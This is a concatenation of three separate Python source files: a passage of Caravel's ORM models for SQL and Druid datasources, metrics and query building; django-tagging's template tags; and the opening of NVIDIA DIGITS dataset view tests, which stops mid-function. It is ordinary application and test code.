metrics.append(M(
metric_name='count',
verbose_name='COUNT(*)',
metric_type='count',
expression="COUNT(*)"
))
for metric in metrics:
m = (
db.session.query(M)
.filter(M.metric_name == metric.metric_name)
.filter(M.table_id == self.id)
.first()
)
metric.table_id = self.id
if not m:
db.session.add(metric)
db.session.commit()
if not self.main_dttm_col:
self.main_dttm_col = any_date_col
class SqlMetric(Model, AuditMixinNullable):
"""ORM object for metrics, each table can have multiple metrics"""
__tablename__ = 'sql_metrics'
id = Column(Integer, primary_key=True)
metric_name = Column(String(512))
verbose_name = Column(String(1024))
metric_type = Column(String(32))
table_id = Column(Integer, ForeignKey('tables.id'))
table = relationship(
'SqlaTable', backref='metrics', foreign_keys=[table_id])
expression = Column(Text)
description = Column(Text)
is_restricted = Column(Boolean, default=False, nullable=True)
d3format = Column(String(128))
@property
def sqla_col(self):
name = self.metric_name
return literal_column(self.expression).label(name)
@property
def perm(self):
return (
"{parent_name}.[{obj.metric_name}](id:{obj.id})"
).format(obj=self,
parent_name=self.table.full_name) if self.table else None
class TableColumn(Model, AuditMixinNullable):
"""ORM object for table columns, each table can have multiple columns"""
__tablename__ = 'table_columns'
id = Column(Integer, primary_key=True)
table_id = Column(Integer, ForeignKey('tables.id'))
table = relationship(
'SqlaTable', backref='columns', foreign_keys=[table_id])
column_name = Column(String(255))
verbose_name = Column(String(1024))
is_dttm = Column(Boolean, default=False)
is_active = Column(Boolean, default=True)
type = Column(String(32), default='')
groupby = Column(Boolean, default=False)
count_distinct = Column(Boolean, default=False)
sum = Column(Boolean, default=False)
max = Column(Boolean, default=False)
min = Column(Boolean, default=False)
filterable = Column(Boolean, default=False)
expression = Column(Text, default='')
description = Column(Text, default='')
python_date_format = Column(String(255))
database_expression = Column(String(255))
num_types = ('DOUBLE', 'FLOAT', 'INT', 'BIGINT', 'LONG')
date_types = ('DATE', 'TIME')
str_types = ('VARCHAR', 'STRING', 'CHAR')
def __repr__(self):
return self.column_name
@property
def isnum(self):
return any([t in self.type.upper() for t in self.num_types])
@property
def is_time(self):
return any([t in self.type.upper() for t in self.date_types])
@property
def is_string(self):
return any([t in self.type.upper() for t in self.str_types])
@property
def sqla_col(self):
name = self.column_name
if not self.expression:
col = column(self.column_name).label(name)
else:
col = literal_column(self.expression).label(name)
return col
def dttm_sql_literal(self, dttm):
"""Convert datetime object to string
If database_expression is empty, the internal dttm
will be parsed as the string with the pattern that
the user inputted (python_date_format)
If database_expression is not empty, the internal dttm
will be parsed as the sql sentence for the database to convert
"""
tf = self.python_date_format or '%Y-%m-%d %H:%M:%S.%f'
if self.database_expression:
return self.database_expression.format(dttm.strftime('%Y-%m-%d %H:%M:%S'))
elif tf == 'epoch_s':
return str((dttm - datetime(1970, 1, 1)).total_seconds())
elif tf == 'epoch_ms':
return str((dttm - datetime(1970, 1, 1)).total_seconds()*1000.0)
else:
default = "'{}'".format(dttm.strftime(tf))
iso = dttm.isoformat()
d = {
'mssql': "CONVERT(DATETIME, '{}', 126)".format(iso), # untested
'mysql': default,
'oracle':
"""TO_TIMESTAMP('{}', 'YYYY-MM-DD"T"HH24:MI:SS.ff6')""".format(
dttm.isoformat()),
'presto': default,
'sqlite': default,
}
for k, v in d.items():
if self.table.database.sqlalchemy_uri.startswith(k):
return v
return default
class DruidCluster(Model, AuditMixinNullable):
"""ORM object referencing the Druid clusters"""
__tablename__ = 'clusters'
id = Column(Integer, primary_key=True)
cluster_name = Column(String(250), unique=True)
coordinator_host = Column(String(255))
coordinator_port = Column(Integer)
coordinator_endpoint = Column(
String(255), default='druid/coordinator/v1/metadata')
broker_host = Column(String(255))
broker_port = Column(Integer)
broker_endpoint = Column(String(255), default='druid/v2')
metadata_last_refreshed = Column(DateTime)
def __repr__(self):
return self.cluster_name
def get_pydruid_client(self):
cli = PyDruid(
"http://{0}:{1}/".format(self.broker_host, self.broker_port),
self.broker_endpoint)
return cli
def get_datasources(self):
endpoint = (
"http://{obj.coordinator_host}:{obj.coordinator_port}/"
"{obj.coordinator_endpoint}/datasources"
).format(obj=self)
return json.loads(requests.get(endpoint).text)
def get_druid_version(self):
endpoint = (
"http://{obj.coordinator_host}:{obj.coordinator_port}/status"
).format(obj=self)
return json.loads(requests.get(endpoint).text)['version']
def refresh_datasources(self):
self.druid_version = self.get_druid_version()
for datasource in self.get_datasources():
if datasource not in config.get('DRUID_DATA_SOURCE_BLACKLIST'):
DruidDatasource.sync_to_db(datasource, self)
class DruidDatasource(Model, AuditMixinNullable, Queryable):
"""ORM object referencing Druid datasources (tables)"""
type = "druid"
baselink = "druiddatasourcemodelview"
__tablename__ = 'datasources'
id = Column(Integer, primary_key=True)
datasource_name = Column(String(255), unique=True)
is_featured = Column(Boolean, default=False)
is_hidden = Column(Boolean, default=False)
description = Column(Text)
default_endpoint = Column(Text)
user_id = Column(Integer, ForeignKey('ab_user.id'))
owner = relationship('User', backref='datasources', foreign_keys=[user_id])
cluster_name = Column(
String(250), ForeignKey('clusters.cluster_name'))
cluster = relationship(
'DruidCluster', backref='datasources', foreign_keys=[cluster_name])
offset = Column(Integer, default=0)
cache_timeout = Column(Integer)
@property
def metrics_combo(self):
return sorted(
[(m.metric_name, m.verbose_name) for m in self.metrics],
key=lambda x: x[1])
@property
def num_cols(self):
return [c.column_name for c in self.columns if c.isnum]
@property
def name(self):
return self.datasource_name
@property
def perm(self):
return (
"[{obj.cluster_name}].[{obj.datasource_name}]"
"(id:{obj.id})").format(obj=self)
@property
def link(self):
return (
'<a href="{self.url}">'
'{self.datasource_name}</a>').format(**locals())
@property
def full_name(self):
return (
"[{obj.cluster_name}]."
"[{obj.datasource_name}]").format(obj=self)
def __repr__(self):
return self.datasource_name
@renders('datasource_name')
def datasource_link(self):
url = "/caravel/explore/{obj.type}/{obj.id}/".format(obj=self)
return '<a href="{url}">{obj.datasource_name}</a>'.format(
url=url, obj=self)
def get_metric_obj(self, metric_name):
return [
m.json_obj for m in self.metrics
if m.metric_name == metric_name
][0]
@staticmethod
def version_higher(v1, v2):
"""is v1 higher than v2
>>> DruidDatasource.version_higher('0.8.2', '0.9.1')
False
>>> DruidDatasource.version_higher('0.8.2', '0.6.1')
True
>>> DruidDatasource.version_higher('0.8.2', '0.8.2')
False
>>> DruidDatasource.version_higher('0.8.2', '0.9.BETA')
False
>>> DruidDatasource.version_higher('0.8.2', '0.9')
False
"""
def int_or_0(v):
try:
v = int(v)
except (TypeError, ValueError):
v = 0
return v
v1nums = [int_or_0(n) for n in v1.split('.')]
v2nums = [int_or_0(n) for n in v2.split('.')]
v1nums = (v1nums + [0, 0, 0])[:3]
v2nums = (v2nums + [0, 0, 0])[:3]
return v1nums[0] > v2nums[0] or \
(v1nums[0] == v2nums[0] and v1nums[1] > v2nums[1]) or \
(v1nums[0] == v2nums[0] and v1nums[1] == v2nums[1] and v1nums[2] > v2nums[2])
def latest_metadata(self):
"""Returns segment metadata from the latest segment"""
client = self.cluster.get_pydruid_client()
results = client.time_boundary(datasource=self.datasource_name)
if not results:
return
max_time = results[0]['result']['maxTime']
max_time = parse(max_time)
# Query segmentMetadata for 7 days back. However, due to a bug,
# we need to set this interval to more than 1 day ago to exclude
# realtime segments, which trigged a bug (fixed in druid 0.8.2).
# https://groups.google.com/forum/#!topic/druid-user/gVCqqspHqOQ
start = (0 if self.version_higher(self.cluster.druid_version, '0.8.2') else 1)
intervals = (max_time - timedelta(days=7)).isoformat() + '/'
intervals += (max_time - timedelta(days=start)).isoformat()
segment_metadata = client.segment_metadata(
datasource=self.datasource_name,
intervals=intervals)
if segment_metadata:
return segment_metadata[-1]['columns']
def generate_metrics(self):
for col in self.columns:
col.generate_metrics()
@classmethod
def sync_to_db(cls, name, cluster):
"""Fetches metadata for that datasource and merges the Caravel db"""
logging.info("Syncing Druid datasource [{}]".format(name))
session = get_session()
datasource = session.query(cls).filter_by(datasource_name=name).first()
if not datasource:
datasource = cls(datasource_name=name)
session.add(datasource)
flasher("Adding new datasource [{}]".format(name), "success")
else:
flasher("Refreshing datasource [{}]".format(name), "info")
session.flush()
datasource.cluster = cluster
session.flush()
cols = datasource.latest_metadata()
if not cols:
return
for col in cols:
col_obj = (
session
.query(DruidColumn)
.filter_by(datasource_name=name, column_name=col)
.first()
)
datatype = cols[col]['type']
if not col_obj:
col_obj = DruidColumn(datasource_name=name, column_name=col)
session.add(col_obj)
if datatype == "STRING":
col_obj.groupby = True
col_obj.filterable = True
if datatype == "hyperUnique" or datatype == "thetaSketch":
col_obj.count_distinct = True
if col_obj:
col_obj.type = cols[col]['type']
session.flush()
col_obj.datasource = datasource
col_obj.generate_metrics()
session.flush()
def query( # druid
self, groupby, metrics,
granularity,
from_dttm, to_dttm,
filter=None, # noqa
is_timeseries=True,
timeseries_limit=None,
row_limit=None,
inner_from_dttm=None, inner_to_dttm=None,
orderby=None,
extras=None, # noqa
select=None, # noqa
columns=None, ):
"""Runs a query against Druid and returns a dataframe.
This query interface is common to SqlAlchemy and Druid
"""
# TODO refactor into using a TBD Query object
qry_start_dttm = datetime.now()
inner_from_dttm = inner_from_dttm or from_dttm
inner_to_dttm = inner_to_dttm or to_dttm
# add tzinfo to native datetime with config
from_dttm = from_dttm.replace(tzinfo=config.get("DRUID_TZ"))
to_dttm = to_dttm.replace(tzinfo=config.get("DRUID_TZ"))
query_str = ""
metrics_dict = {m.metric_name: m for m in self.metrics}
all_metrics = []
post_aggs = {}
def recursive_get_fields(_conf):
_fields = _conf.get('fields', [])
field_names = []
for _f in _fields:
_type = _f.get('type')
if _type in ['fieldAccess', 'hyperUniqueCardinality']:
field_names.append(_f.get('fieldName'))
elif _type == 'arithmetic':
field_names += recursive_get_fields(_f)
return list(set(field_names))
for metric_name in metrics:
metric = metrics_dict[metric_name]
if metric.metric_type != 'postagg':
all_metrics.append(metric_name)
else:
conf = metric.json_obj
all_metrics += recursive_get_fields(conf)
all_metrics += conf.get('fieldNames', [])
if conf.get('type') == 'javascript':
post_aggs[metric_name] = JavascriptPostAggregator(
name=conf.get('name'),
field_names=conf.get('fieldNames'),
function=conf.get('function'))
else:
post_aggs[metric_name] = Postaggregator(
conf.get('fn', "/"),
conf.get('fields', []),
conf.get('name', ''))
aggregations = {
m.metric_name: m.json_obj
for m in self.metrics
if m.metric_name in all_metrics
}
rejected_metrics = [
m.metric_name for m in self.metrics
if m.is_restricted and
m.metric_name in aggregations.keys() and
not sm.has_access('metric_access', m.perm)
]
if rejected_metrics:
raise MetricPermException(
"Access to the metrics denied: " + ', '.join(rejected_metrics)
)
granularity = granularity or "all"
if granularity != "all":
granularity = utils.parse_human_timedelta(
granularity).total_seconds() * 1000
if not isinstance(granularity, string_types):
granularity = {"type": "duration", "duration": granularity}
origin = extras.get('druid_time_origin')
if origin:
dttm = utils.parse_human_datetime(origin)
granularity['origin'] = dttm.isoformat()
qry = dict(
datasource=self.datasource_name,
dimensions=groupby,
aggregations=aggregations,
granularity=granularity,
post_aggregations=post_aggs,
intervals=from_dttm.isoformat() + '/' + to_dttm.isoformat(),
)
filters = self.get_filters(filter)
if filters:
qry['filter'] = filters
having_filters = self.get_having_filters(extras.get('having_druid'))
if having_filters:
qry['having'] = having_filters
client = self.cluster.get_pydruid_client()
orig_filters = filters
if timeseries_limit and is_timeseries:
# Limit on the number of timeseries, doing a two-phases query
pre_qry = deepcopy(qry)
pre_qry['granularity'] = "all"
pre_qry['limit_spec'] = {
"type": "default",
"limit": timeseries_limit,
'intervals': (
inner_from_dttm.isoformat() + '/' +
inner_to_dttm.isoformat()),
"columns": [{
"dimension": metrics[0] if metrics else self.metrics[0],
"direction": "descending",
}],
}
client.groupby(**pre_qry)
query_str += "// Two phase query\n// Phase 1\n"
query_str += json.dumps(
client.query_builder.last_query.query_dict, indent=2) + "\n"
query_str += "//\nPhase 2 (built based on phase one's results)\n"
df = client.export_pandas()
if df is not None and not df.empty:
dims = qry['dimensions']
filters = []
for unused, row in df.iterrows():
fields = []
for dim in dims:
f = Dimension(dim) == row[dim]
fields.append(f)
if len(fields) > 1:
filt = Filter(type="and", fields=fields)
filters.append(filt)
elif fields:
filters.append(fields[0])
if filters:
ff = Filter(type="or", fields=filters)
if not orig_filters:
qry['filter'] = ff
else:
qry['filter'] = Filter(type="and", fields=[
ff,
orig_filters])
qry['limit_spec'] = None
if row_limit:
qry['limit_spec'] = {
"type": "default",
"limit": row_limit,
"columns": [{
"dimension": metrics[0] if metrics else self.metrics[0],
"direction": "descending",
}],
}
client.groupby(**qry)
query_str += json.dumps(
client.query_builder.last_query.query_dict, indent=2)
df = client.export_pandas()
if df is None or df.size == 0:
raise Exception(_("No data was returned."))
if (
not is_timeseries and
granularity == "all" and
'timestamp' in df.columns):
del df['timestamp']
# Reordering columns
cols = []
if 'timestamp' in df.columns:
cols += ['timestamp']
cols += [col for col in groupby if col in df.columns]
cols += [col for col in metrics if col in df.columns]
df = df[cols]
return QueryResult(
df=df,
query=query_str,
duration=datetime.now() - qry_start_dttm)
@staticmethod
def get_filters(raw_filters):
filters = None
for col, op, eq in raw_filters:
cond = None
if op == '==':
cond = Dimension(col) == eq
elif op == '!=':
cond = ~(Dimension(col) == eq)
elif op in ('in', 'not in'):
fields = []
splitted = eq.split(',')
if len(splitted) > 1:
for s in eq.split(','):
s = s.strip()
fields.append(Dimension(col) == s)
cond = Filter(type="or", fields=fields)
else:
cond = Dimension(col) == eq
if op == 'not in':
cond = ~cond
elif op == 'regex':
cond = Filter(type="regex", pattern=eq, dimension=col)
if filters:
filters = Filter(type="and", fields=[
cond,
filters
])
else:
filters = cond
return filters
def _get_having_obj(self, col, op, eq):
cond = None
if op == '==':
if col in self.column_names:
cond = DimSelector(dimension=col, value=eq)
else:
cond = Aggregation(col) == eq
elif op == '>':
cond = Aggregation(col) > eq
elif op == '<':
cond = Aggregation(col) < eq
return cond
def get_having_filters(self, raw_filters):
filters = None
reversed_op_map = {
'!=': '==',
'>=': '<',
'<=': '>'
}
for col, op, eq in raw_filters:
cond = None
if op in ['==', '>', '<']:
cond = self._get_having_obj(col, op, eq)
elif op in reversed_op_map:
cond = ~self._get_having_obj(col, reversed_op_map[op], eq)
if filters:
filters = filters & cond
else:
filters = cond
return filters
class Log(Model):
"""ORM object used to log Caravel actions to the database"""
__tablename__ = 'logs'
id = Column(Integer, primary_key=True)
action = Column(String(512))
user_id = Column(Integer, ForeignKey('ab_user.id'))
dashboard_id = Column(Integer)
slice_id = Column(Integer)
json = Column(Text)
user = relationship('User', backref='logs', foreign_keys=[user_id])
dttm = Column(DateTime, default=func.now())
dt = Column(Date, default=date.today())
@classmethod
def log_this(cls, f):
"""Decorator to log user actions"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
user_id = None
if g.user:
user_id = g.user.get_id()
d = request.args.to_dict()
d.update(kwargs)
slice_id = d.get('slice_id', 0)
slice_id = int(slice_id) if slice_id else 0
log = cls(
action=f.__name__,
json=json.dumps(d),
dashboard_id=d.get('dashboard_id') or None,
slice_id=slice_id,
user_id=user_id)
db.session.add(log)
db.session.commit()
return f(*args, **kwargs)
return wrapper
class DruidMetric(Model, AuditMixinNullable):
"""ORM object referencing Druid metrics for a datasource"""
__tablename__ = 'metrics'
id = Column(Integer, primary_key=True)
metric_name = Column(String(512))
verbose_name = Column(String(1024))
metric_type = Column(String(32))
datasource_name = Column(
String(255),
ForeignKey('datasources.datasource_name'))
# Setting enable_typechecks=False disables polymorphic inheritance.
datasource = relationship('DruidDatasource', backref='metrics',
enable_typechecks=False)
json = Column(Text)
description = Column(Text)
is_restricted = Column(Boolean, default=False, nullable=True)
d3format = Column(String(128))
@property
def json_obj(self):
try:
obj = json.loads(self.json)
except Exception:
obj = {}
return obj
@property
def perm(self):
return (
"{parent_name}.[{obj.metric_name}](id:{obj.id})"
).format(obj=self,
parent_name=self.datasource.full_name
) if self.datasource else None
class DruidColumn(Model, AuditMixinNullable):
"""ORM model for storing Druid datasource column metadata"""
__tablename__ = 'columns'
id = Column(Integer, primary_key=True)
datasource_name = Column(
String(255),
ForeignKey('datasources.datasource_name'))
# Setting enable_typechecks=False disables polymorphic inheritance.
datasource = relationship('DruidDatasource', backref='columns',
enable_typechecks=False)
column_name = Column(String(255))
is_active = Column(Boolean, default=True)
type = Column(String(32))
groupby = Column(Boolean, default=False)
count_distinct = Column(Boolean, default=False)
sum = Column(Boolean, default=False)
max = Column(Boolean, default=False)
min = Column(Boolean, default=False)
filterable = Column(Boolean, default=False)
description = Column(Text)
def __repr__(self):
return self.column_name
@property
def isnum(self):
return self.type in ('LONG', 'DOUBLE', 'FLOAT', 'INT')
def generate_metrics(self):
"""Generate metrics based on the column metadata"""
M = DruidMetric # noqa
metrics = []
metrics.append(DruidMetric(
metric_name='count',
verbose_name='COUNT(*)',
metric_type='count',
json=json.dumps({'type': 'count', 'name': 'count'})
))
# Somehow we need to reassign this for UDAFs
if self.type in ('DOUBLE', 'FLOAT'):
corrected_type = 'DOUBLE'
else:
corrected_type = self.type
if self.sum and self.isnum:
mt = corrected_type.lower() + 'Sum'
name = 'sum__' + self.column_name
metrics.append(DruidMetric(
metric_name=name,
metric_type='sum',
verbose_name='SUM({})'.format(self.column_name),
json=json.dumps({
'type': mt, 'name': name, 'fieldName': self.column_name})
))
if self.min and self.isnum:
mt = corrected_type.lower() + 'Min'
name = 'min__' + self.column_name
metrics.append(DruidMetric(
metric_name=name,
metric_type='min',
verbose_name='MIN({})'.format(self.column_name),
json=json.dumps({
'type': mt, 'name': name, 'fieldName': self.column_name})
))
if self.max and self.isnum:
mt = corrected_type.lower() + 'Max'
name = 'max__' + self.column_name
metrics.append(DruidMetric(
metric_name=name,
metric_type='max',
verbose_name='MAX({})'.format(self.column_name),
json=json.dumps({
'type': mt, 'name': name, 'fieldName': self.column_name})
))
if self.count_distinct:
name = 'count_distinct__' + self.column_name
if self.type == 'hyperUnique' or self.type == 'thetaSketch':
metrics.append(DruidMetric(
metric_name=name,
verbose_name='COUNT(DISTINCT {})'.format(self.column_name),
metric_type=self.type,
json=json.dumps({
'type': self.type,
'name': name,
'fieldName': self.column_name
})
))
else:
mt = 'count_distinct'
metrics.append(DruidMetric(
metric_name=name,
verbose_name='COUNT(DISTINCT {})'.format(self.column_name),
metric_type='count_distinct',
json=json.dumps({
'type': 'cardinality',
'name': name,
'fieldNames': [self.column_name]})
))
session = get_session()
new_metrics = []
for metric in metrics:
m = (
session.query(M)
.filter(M.metric_name == metric.metric_name)
.filter(M.datasource_name == self.datasource_name)
.filter(DruidCluster.cluster_name == self.datasource.cluster_name)
.first()
)
metric.datasource_name = self.datasource_name
if not m:
new_metrics.append(metric)
session.add(metric)
session.flush()
utils.init_metrics_perm(caravel, new_metrics)
class FavStar(Model):
__tablename__ = 'favstar'
id = Column(Integer, primary_key=True)
user_id = Column(Integer, ForeignKey('ab_user.id'))
class_name = Column(String(50))
obj_id = Column(Integer)
dttm = Column(DateTime, default=func.now())
|
|
from django.db.models import get_model
from django.template import Library, Node, TemplateSyntaxError, Variable, resolve_variable
from django.utils.translation import ugettext as _
from tagging.models import Tag, TaggedItem
from tagging.utils import LINEAR, LOGARITHMIC
register = Library()
class TagsForModelNode(Node):
def __init__(self, model, context_var, counts):
self.model = model
self.context_var = context_var
self.counts = counts
def render(self, context):
model = get_model(*self.model.split('.'))
if model is None:
raise TemplateSyntaxError(_('tags_for_model tag was given an invalid model: %s') % self.model)
context[self.context_var] = Tag.objects.usage_for_model(model, counts=self.counts)
return ''
class TagCloudForModelNode(Node):
def __init__(self, model, context_var, **kwargs):
self.model = model
self.context_var = context_var
self.kwargs = kwargs
def render(self, context):
model = get_model(*self.model.split('.'))
if model is None:
raise TemplateSyntaxError(_('tag_cloud_for_model tag was given an invalid model: %s') % self.model)
context[self.context_var] = \
Tag.objects.cloud_for_model(model, **self.kwargs)
return ''
class TagsForObjectNode(Node):
def __init__(self, obj, context_var):
self.obj = Variable(obj)
self.context_var = context_var
def render(self, context):
context[self.context_var] = \
Tag.objects.get_for_object(self.obj.resolve(context))
return ''
class TaggedObjectsNode(Node):
def __init__(self, tag, model, context_var):
self.tag = Variable(tag)
self.context_var = context_var
self.model = model
def render(self, context):
model = get_model(*self.model.split('.'))
if model is None:
raise TemplateSyntaxError(_('tagged_objects tag was given an invalid model: %s') % self.model)
context[self.context_var] = \
TaggedItem.objects.get_by_model(model, self.tag.resolve(context))
return ''
def do_tags_for_model(parser, token):
"""
Retrieves a list of ``Tag`` objects associated with a given model
and stores them in a context variable.
Usage::
{% tags_for_model [model] as [varname] %}
The model is specified in ``[appname].[modelname]`` format.
Extended usage::
{% tags_for_model [model] as [varname] with counts %}
If specified - by providing extra ``with counts`` arguments - adds
a ``count`` attribute to each tag containing the number of
instances of the given model which have been tagged with it.
Examples::
{% tags_for_model products.Widget as widget_tags %}
{% tags_for_model products.Widget as widget_tags with counts %}
"""
bits = token.contents.split()
len_bits = len(bits)
if len_bits not in (4, 6):
raise TemplateSyntaxError(_('%s tag requires either three or five arguments') % bits[0])
if bits[2] != 'as':
raise TemplateSyntaxError(_("second argument to %s tag must be 'as'") % bits[0])
if len_bits == 6:
if bits[4] != 'with':
raise TemplateSyntaxError(_("if given, fourth argument to %s tag must be 'with'") % bits[0])
if bits[5] != 'counts':
raise TemplateSyntaxError(_("if given, fifth argument to %s tag must be 'counts'") % bits[0])
if len_bits == 4:
return TagsForModelNode(bits[1], bits[3], counts=False)
else:
return TagsForModelNode(bits[1], bits[3], counts=True)
def do_tag_cloud_for_model(parser, token):
"""
Retrieves a list of ``Tag`` objects for a given model, with tag
cloud attributes set, and stores them in a context variable.
Usage::
{% tag_cloud_for_model [model] as [varname] %}
The model is specified in ``[appname].[modelname]`` format.
Extended usage::
{% tag_cloud_for_model [model] as [varname] with [options] %}
Extra options can be provided after an optional ``with`` argument,
with each option being specified in ``[name]=[value]`` format. Valid
extra options are:
``steps``
Integer. Defines the range of font sizes.
``min_count``
Integer. Defines the minimum number of times a tag must have
been used to appear in the cloud.
``distribution``
One of ``linear`` or ``log``. Defines the font-size
distribution algorithm to use when generating the tag cloud.
Examples::
{% tag_cloud_for_model products.Widget as widget_tags %}
{% tag_cloud_for_model products.Widget as widget_tags with steps=9 min_count=3 distribution=log %}
"""
bits = token.contents.split()
len_bits = len(bits)
if len_bits != 4 and len_bits not in range(6, 9):
raise TemplateSyntaxError(_('%s tag requires either three or between five and seven arguments') % bits[0])
if bits[2] != 'as':
raise TemplateSyntaxError(_("second argument to %s tag must be 'as'") % bits[0])
kwargs = {}
if len_bits > 5:
if bits[4] != 'with':
raise TemplateSyntaxError(_("if given, fourth argument to %s tag must be 'with'") % bits[0])
for i in range(5, len_bits):
try:
name, value = bits[i].split('=')
if name == 'steps' or name == 'min_count':
try:
kwargs[str(name)] = int(value)
except ValueError:
raise TemplateSyntaxError(_("%(tag)s tag's '%(option)s' option was not a valid integer: '%(value)s'") % {
'tag': bits[0],
'option': name,
'value': value,
})
elif name == 'distribution':
if value in ['linear', 'log']:
kwargs[str(name)] = {'linear': LINEAR, 'log': LOGARITHMIC}[value]
else:
raise TemplateSyntaxError(_("%(tag)s tag's '%(option)s' option was not a valid choice: '%(value)s'") % {
'tag': bits[0],
'option': name,
'value': value,
})
else:
raise TemplateSyntaxError(_("%(tag)s tag was given an invalid option: '%(option)s'") % {
'tag': bits[0],
'option': name,
})
except ValueError:
raise TemplateSyntaxError(_("%(tag)s tag was given a badly formatted option: '%(option)s'") % {
'tag': bits[0],
'option': bits[i],
})
return TagCloudForModelNode(bits[1], bits[3], **kwargs)
def do_tags_for_object(parser, token):
"""
Retrieves a list of ``Tag`` objects associated with an object and
stores them in a context variable.
Usage::
{% tags_for_object [object] as [varname] %}
Example::
{% tags_for_object foo_object as tag_list %}
"""
bits = token.contents.split()
if len(bits) != 4:
raise TemplateSyntaxError(_('%s tag requires exactly three arguments') % bits[0])
if bits[2] != 'as':
raise TemplateSyntaxError(_("second argument to %s tag must be 'as'") % bits[0])
return TagsForObjectNode(bits[1], bits[3])
def do_tagged_objects(parser, token):
"""
Retrieves a list of instances of a given model which are tagged with
a given ``Tag`` and stores them in a context variable.
Usage::
{% tagged_objects [tag] in [model] as [varname] %}
The model is specified in ``[appname].[modelname]`` format.
The tag must be an instance of a ``Tag``, not the name of a tag.
Example::
{% tagged_objects comedy_tag in tv.Show as comedies %}
"""
bits = token.contents.split()
if len(bits) != 6:
raise TemplateSyntaxError(_('%s tag requires exactly five arguments') % bits[0])
if bits[2] != 'in':
raise TemplateSyntaxError(_("second argument to %s tag must be 'in'") % bits[0])
if bits[4] != 'as':
raise TemplateSyntaxError(_("fourth argument to %s tag must be 'as'") % bits[0])
return TaggedObjectsNode(bits[1], bits[3], bits[5])
register.tag('tags_for_model', do_tags_for_model)
register.tag('tag_cloud_for_model', do_tag_cloud_for_model)
register.tag('tags_for_object', do_tags_for_object)
register.tag('tagged_objects', do_tagged_objects)
|
|
# Copyright (c) 2014-2015, NVIDIA CORPORATION. All rights reserved.
import json
import os
import shutil
import tempfile
import time
import unittest
import itertools
import urllib
from gevent import monkey
monkey.patch_all()
from bs4 import BeautifulSoup
import PIL.Image
from urlparse import urlparse
from cStringIO import StringIO
import digits.test_views
from test_imageset_creator import create_classification_imageset, IMAGE_SIZE as DUMMY_IMAGE_SIZE, IMAGE_COUNT as DUMMY_IMAGE_COUNT
# May be too short on a slow system
TIMEOUT_DATASET = 20
################################################################################
# Base classes (they don't start with "Test" so nose won't run them)
################################################################################
class BaseViewsTest(digits.test_views.BaseViewsTest):
"""
Provides some functions
"""
@classmethod
def dataset_exists(cls, job_id):
return cls.job_exists(job_id, 'datasets')
@classmethod
def dataset_status(cls, job_id):
return cls.job_status(job_id, 'datasets')
@classmethod
def dataset_info(cls, job_id):
return cls.job_info(job_id, 'datasets')
@classmethod
def abort_dataset(cls, job_id):
return cls.abort_job(job_id, job_type='datasets')
@classmethod
def dataset_wait_completion(cls, job_id, **kwargs):
kwargs['job_type'] = 'datasets'
if 'timeout' not in kwargs:
kwargs['timeout'] = TIMEOUT_DATASET
return cls.job_wait_completion(job_id, **kwargs)
@classmethod
def delete_dataset(cls, job_id):
return cls.delete_job(job_id, job_type='datasets')
class BaseViewsTestWithImageset(BaseViewsTest):
"""
Provides an imageset and some functions
"""
# Inherited classes may want to override these attributes
IMAGE_HEIGHT = 10
IMAGE_WIDTH = 10
IMAGE_CHANNELS = 3
BACKEND = 'lmdb'
COMPRESSION = 'none'
UNBALANCED_CATEGORY = False
@classmethod
def setUpClass(cls):
super(BaseViewsTestWithImageset, cls).setUpClass()
cls.imageset_folder = tempfile.mkdtemp()
# create imageset
cls.imageset_paths = create_classification_imageset(cls.imageset_folder,
add_unbalanced_category=cls.UNBALANCED_CATEGORY)
cls.created_datasets = []
@classmethod
def tearDownClass(cls):
# delete any created datasets
for job_id in cls.created_datasets:
cls.delete_dataset(job_id)
# delete imageset
shutil.rmtree(cls.imageset_folder)
super(BaseViewsTestWithImageset, cls).tearDownClass()
@classmethod
def create_dataset(cls, **kwargs):
"""
Create a dataset
Returns the job_id
Raises RuntimeError if job fails to create
Keyword arguments:
**kwargs -- data to be sent with POST request
"""
data = {
'dataset_name': 'test_dataset',
'method': 'folder',
'folder_train': cls.imageset_folder,
'resize_channels': cls.IMAGE_CHANNELS,
'resize_width': cls.IMAGE_WIDTH,
'resize_height': cls.IMAGE_HEIGHT,
'backend': cls.BACKEND,
'compression': cls.COMPRESSION,
}
data.update(kwargs)
request_json = data.pop('json', False)
url = '/datasets/images/classification'
if request_json:
url += '.json'
rv = cls.app.post(url, data=data)
if request_json:
if rv.status_code != 200:
print json.loads(rv.data)
raise RuntimeError('Model creation failed with %s' % rv.status_code)
return json.loads(rv.data)['id']
# expect a redirect
if not 300 <= rv.status_code <= 310:
s = BeautifulSoup(rv.data)
div = s.select('div.alert-danger')
if div:
raise RuntimeError(div[0])
else:
raise RuntimeError('Failed to create dataset')
job_id = cls.job_id_from_response(rv)
assert cls.dataset_exists(job_id), 'dataset not found after successful creation'
cls.created_datasets.append(job_id)
return job_id
@classmethod
def categoryCount(cls):
return len(cls.imageset_paths.keys())
class BaseViewsTestWithDataset(BaseViewsTestWithImageset):
"""
Provides a dataset and some functions
"""
@classmethod
def setUpClass(cls):
super(BaseViewsTestWithDataset, cls).setUpClass()
cls.dataset_id = cls.create_dataset(json=True)
assert cls.dataset_wait_completion(cls.dataset_id) == 'Done', 'create failed'
################################################################################
# Test classes
################################################################################
class TestViews(BaseViewsTest):
"""
Tests which don't require an imageset or a dataset
"""
def test_page_dataset_new(self):
rv = self.app.get('/datasets/images/classification/new')
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
assert 'New Image Classification Dataset' in rv.data, 'unexpected page format'
def test_nonexistent_dataset(self):
assert not self.dataset_exists('foo'), "dataset shouldn't exist"
class TestCreation(BaseViewsTestWithImageset):
"""
Dataset creation tests
"""
def test_nonexistent_folder(self):
try:
job_id = self.create_dataset(
folder_train = '/not-a-directory'
)
except RuntimeError:
return
raise AssertionError('Should have failed')
def test_create_json(self):
job_id = self.create_dataset(json=True)
self.abort_dataset(job_id)
def test_create_delete(self):
job_id = self.create_dataset()
assert self.delete_dataset(job_id) == 200, 'delete failed'
assert not self.dataset_exists(job_id), 'dataset exists after delete'
def test_create_abort_delete(self):
job_id = self.create_dataset()
assert self.abort_dataset(job_id) == 200, 'abort failed'
assert self.delete_dataset(job_id) == 200, 'delete failed'
assert not self.dataset_exists(job_id), 'dataset exists after delete'
def test_create_wait_delete(self):
job_id = self.create_dataset()
assert self.dataset_wait_completion(job_id) == 'Done', 'create failed'
assert self.delete_dataset(job_id) == 200, 'delete failed'
assert not self.dataset_exists(job_id), 'dataset exists after delete'
def test_textfiles(self):
for absolute_path in (True, False):
